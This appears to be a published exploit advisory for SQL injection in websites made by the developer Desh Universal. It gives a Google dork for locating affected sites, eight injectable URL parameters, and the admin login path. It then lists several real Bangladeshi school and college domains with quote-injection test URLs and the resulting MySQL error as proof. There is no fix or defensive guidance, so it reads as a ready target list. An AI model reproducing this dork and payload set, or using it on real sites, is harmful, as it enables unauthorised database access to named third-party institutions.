#################################################################################################
# Exploit Title : Developed by Desh Universal (Pvt.) Limited SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/09/2018
# Vendor Homepage : deshuniversal.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''Developed by Desh Universal (Pvt.) Limited.''
# Exploits :
/teacher?page=[SQL Injection]
/teacher?page=[ID-NUMBER]&dept_id=&cat_id=[SQL Injection]
/event-details?events-id=[SQL Injection]
/notice-details?nid=[SQL Injection]
/messages?messageid=[SQL Injection]
/text-file?file_id=[SQL Injection]
/details?id=[SQL Injection]
/program-subjects?programID=[SQL Injection]
# Admin Control Panel Path => /login
It redirects to another links for login with username and pass.
#################################################################################################
# Example Site =>
rcpsc.edu.bd/teacher?page=4&dept_id=&cat_id=1%27 => [ Proof of Concept ] => archive.is/LIcq4
acps.edu.bd/messages?mid=101%27
cpscm.edu.bd/details?id=5%27
dcc.edu.bd/notice-details?nid=666%27
# SQL Database Error =>
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '' ORDER BY dupl_teachers.seniority ASC LIMIT 30,10' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################